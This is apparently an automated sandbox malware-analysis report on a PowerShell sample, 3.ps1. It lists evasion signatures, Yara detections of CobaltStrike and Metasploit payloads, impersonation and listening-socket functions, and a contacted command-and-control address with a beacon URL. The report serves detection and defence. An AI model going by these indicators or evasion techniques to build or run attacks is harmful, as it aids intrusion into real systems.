Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C5854 0_2_0000022EFA0C5854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BFA1C 0_2_0000022EFA0BFA1C
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3583 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6247 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe API coverage: 2.1 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0BFA1C 0_2_0000022EFA0BFA1C
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_0000022EFA0C1C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose, 0_2_0000022EFA0C9220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000000.00000002.4121090412.0000022EF9CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9DBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4121724697.0000022EF9DB6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0000022EFA0D9744
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0000022EFA0D9744
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0000022EFA0D9744
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C76F0 InitializeProcThreadAttributeList,GetProcessHeap,HeapAlloc,InitializeProcThreadAttributeList, 0_2_0000022EFA0C76F0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E24E0 RtlVirtualUnwind,SetUnhandledExceptionFilter, 0_2_0000022EFA0E24E0

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
Contains functionality to execute programs as a different user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0CDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_0000022EFA0CDF50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0CDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0000022EFA0CDEC8
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0920 CreateNamedPipeA, 0_2_0000022EFA0C0920
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0DECB0 GetSystemTimeAsFileTime, 0_2_0000022EFA0DECB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E2068 GetUserNameA, 0_2_0000022EFA0E2068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf, 0_2_0000022EFA0C5E28

Remote Access Functionality
barindex
Yara detected CobaltStrike
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
Source: Yara match File source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected MetasploitPayload
Source: Yara match File source: 3.ps1, type: SAMPLE
Source: Yara match File source: amsi64_1900.amsi.csv, type: OTHER
Source: Yara match File source: 00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4114351286.0000022EF1952000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4098790194.0000022EE28B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C6670 htonl,htons,socket,closesocket,bind,ioctlsocket, 0_2_0000022EFA0C6670
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0CEE8C socket,closesocket,htons,bind,listen, 0_2_0000022EFA0CEE8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E2630 bind, 0_2_0000022EFA0E2630
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C6A78 socket,htons,ioctlsocket,closesocket,bind,listen, 0_2_0000022EFA0C6A78
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562630 Sample: 3.ps1 Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 14 Suricata IDS alerts for network traffic 2->14 16 Found malware configuration 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 7 other signatures 2->20 6 powershell.exe 20 2->6         started        process3 dnsIp4 12 3.78.244.11, 49730, 49731, 49738 AMAZON-02US United States 6->12 22 Found suspicious powershell code related to unpacking or dynamic code loading 6->22 24 Contains functionality to detect sleep reduction / modifications 6->24 10 conhost.exe 6->10         started        signatures5 process6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
3.78.244.11
 unknown United States
16509 AMAZON-02US true

Contacted URLs

Name Malicious Antivirus Detection Reputation
3.78.244.11 true
  • Avira URL Cloud: safe
 unknown
http://3.78.244.11:8080/dot.gif true
  • Avira URL Cloud: safe
 unknown